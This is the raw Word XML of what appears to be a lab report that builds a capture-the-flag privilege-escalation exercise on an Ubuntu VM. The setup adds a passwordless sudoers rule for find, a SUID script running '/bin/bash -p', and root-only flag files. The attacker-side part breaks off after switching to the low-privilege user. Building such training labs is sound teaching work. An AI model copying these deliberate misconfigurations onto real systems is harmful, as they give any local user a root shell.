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3F63" w14:textId="4BE2395F" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="06EC7EBA" w14:textId="77777777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t>2.2.3 Phase 3 – Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C65D2B" w14:textId="40BFC6EE" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="09F10BEC" w14:textId="77777777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t>Scenario Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F631347" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve">In this phase, the attacker starts with access to a low-privileged local user account (employee) on the Ubuntu VM. The objective is to escalate privileges to the root user by exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo misconfiguration (medium challenge)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve"> and an </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>insecure SUID binary (hard challenge)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E793FD" w14:textId="183F7500" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="4D251ADD" w14:textId="77777777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t>Part A – Environment Setup (Ubuntu VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238474D7" w14:textId="557840FD" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="2B832CCE" w14:textId="657EC18E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t>Creating a Low-Privilege User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AA65D" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>A new low-privileged user named employee was created to simulate a standard internal employee account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD1B38" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA2096" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo useradd -m -s /bin/bash employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC11441" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo passwd employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32BB89" w14:textId="3482F57A" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000565B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F100DE2" wp14:editId="190C8F0A">
            <wp:extent cx="5943600" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193544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1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39E8" w14:textId="01620866" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="09DBE3DA" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D274987" w14:textId="6C4E200F" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EE6912" w:rsidP="00EB2E50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EB2E50" w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating the Medium Difficulty Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773CAE7C" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>A flag file for the medium challenge was created inside the /root directory, ensuring it is only accessible with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFEC135" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146F953" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo nano /root/phase3_medium_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD7D4B8" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag Content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45088271" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>FLAG{PHASE3_SUDO_MISCONFIG_ROOT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280FC98" w14:textId="5DD59590" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000565B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65D78EDA" wp14:editId="26D4212E">
            <wp:extent cx="5943600" cy="3301365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5483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0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5CAD" w14:textId="3FC933D0" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="0000565B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D579AC" wp14:editId="28D915E9">
            <wp:extent cx="5943600" cy="3304540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52775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54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415D" w14:textId="3309A898" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="4B8C413E" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69436739" w14:textId="0649FDE3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lastRenderedPageBreak/>
        <w:t>Securing the Medium Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DBD8C3" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>Permissions on the medium flag file were restricted so that only the root user can read or modify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62178F9F" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEDBE59" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo chmod 600 /root/phase3_medium_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74118E61" w14:textId="1F710898" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000565B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E63714E" wp14:editId="43A08CFF">
            <wp:extent cx="5943600" cy="3294380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="172607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72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2C70" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60900F1B" w14:textId="5A68CA93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lastRenderedPageBreak/>
        <w:t>Configuring the Sudo Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A05FFE" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve">The sudoers file was edited to introduce a deliberate misconfiguration. The employee user was allowed to run the find binary with root privileges </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without a password</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508F5D4D" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB3E7F" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo nano /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F995AB7" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Added Line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939EA63" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>employee ALL=(ALL) NOPASSWD: /usr/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE18B85" w14:textId="5BA41BBE" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000565B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C93053" wp14:editId="4C929DB4">
            <wp:extent cx="5943600" cy="3267710"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="198527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73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1F98" w14:textId="2FB8ECF1" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="4EEC43D1" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C72DF7C" w14:textId="62B654A9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lastRenderedPageBreak/>
        <w:t>Creating the SUID Backup Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF48D03" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>A script was created in /usr/local/bin that spawns a privileged shell. This script is intended for the hard challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D27464" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C82B66" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo nano /usr/local/bin/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F35A054" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script Content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375479CD" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED18BA8" w14:textId="598E3A72" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000565B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40650380" wp14:editId="51971A17">
            <wp:extent cx="5943600" cy="3296285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30421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16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01AA" w14:textId="6BD08A02" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="008D1681">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4B51DC" wp14:editId="50C7EBC0">
            <wp:extent cx="5943600" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="48000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03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923D" w14:textId="20AC0902" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="3DB96B3C" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1D858" w14:textId="2FC3B362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lastRenderedPageBreak/>
        <w:t>Assigning SUID Permissions to the Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48358BEC" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The script was made executable and assigned the SUID bit, causing it to execute with root privileges regardless of the calling user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945C269" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144022A5" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo chmod +x /usr/local/bin/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7DC803" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo chmod u+s /usr/local/bin/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F2483" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>ls -l /usr/local/bin/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D86E28" w14:textId="11D75592" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFA8EC5" wp14:editId="01A348BC">
            <wp:extent cx="5943600" cy="908685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="114319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99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63C4" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="7F06FA0D" w14:textId="238903D6" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="6DF05904" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3B8F0" w14:textId="5A3301FA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lastRenderedPageBreak/>
        <w:t>Creating the Hard Difficulty Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA9E8A" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>A second flag was created for the hard challenge, also stored inside the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E30D553" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027485AE" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo nano /root/phase3_hard_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B392459" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag Content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3456C1" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>FLAG{PHASE3_SUID_BINARY_ESCALATION}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F11495" w14:textId="77D6555C" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74959771" wp14:editId="7AE36D8F">
            <wp:extent cx="5943600" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="155299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0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2626" w14:textId="56943501" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00064B2A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC23FDB" wp14:editId="7B7C7BB6">
            <wp:extent cx="5943600" cy="3300730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3155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7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9C9A" w14:textId="71A2F458" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="6685137E" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F179F2D" w14:textId="1CD4C5C5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lastRenderedPageBreak/>
        <w:t>Securing the Hard Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78427C60" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The hard flag file was locked down so that only root can access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA78F8" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF92F2" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo chmod 600 /root/phase3_hard_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E50105" w14:textId="7082AB9F" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FFEE40D" wp14:editId="3455B4F5">
            <wp:extent cx="5943600" cy="1732280"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="182684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44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CBA5" w14:textId="570BFB49" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="72CAD510" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AADD15" w14:textId="01A28BDB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lastRenderedPageBreak/>
        <w:t>Part B – Exploitation Phase (Attacker Perspective)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF024A8" w14:textId="0BDF0CE2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t>Switching to the Employee User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAF316" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The attacker switched from the administrative user to the low-privileged employee account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C535B" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E6A505" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>su - employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69559E49" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A63ED3" w14:textId="6B06C48D" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DAF53A0" wp14:editId="4EAA1074">
            <wp:extent cx="5943600" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
